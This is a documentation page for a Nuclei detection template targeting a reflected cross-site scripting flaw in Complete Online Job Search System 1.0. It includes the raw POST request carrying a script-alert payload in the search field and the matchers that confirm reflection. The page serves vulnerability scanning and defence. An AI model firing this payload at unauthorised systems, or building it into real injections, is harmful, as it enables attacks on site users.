Complete Online Job Search System 1.0 - Cross-Site Scripting
ID: eris-xss
Severity: high
Author: arafatansari
Tags: cve,cve2022,xss,eris,sqli
Description
Section titled “Description”Complete Online Job Search System 1.0 contains a cross-site scripting vulnerability via index.php?q=advancesearch.
YAML Source
Section titled “YAML Source”id: eris-xss
info: name: Complete Online Job Search System 1.0 - Cross-Site Scripting author: arafatansari severity: high description: | Complete Online Job Search System 1.0 contains a cross-site scripting vulnerability via index.php?q=advancesearch. reference: - https://github.com/debug601/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-9.md classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 metadata: verified: true max-request: 1 tags: cve,cve2022,xss,eris,sqli
http: - raw: - | POST /index.php?q=result&searchfor=advancesearch HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
SEARCH=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&COMPANY=&CATEGORY=&submit=Submit
matchers-condition: and matchers: - type: word part: body words: - 'Result : <script>alert(document.domain)</script>' - 'ERIS' condition: and
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022069d6fac1fa111ba6976e2777f93776699b1f300e217754f740babd494a27cd92022100dbe44fcecfa5f454a88fbea4ba48704478d8611f8648fb8db10ed6e24623c4a1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/eris-xss.yaml"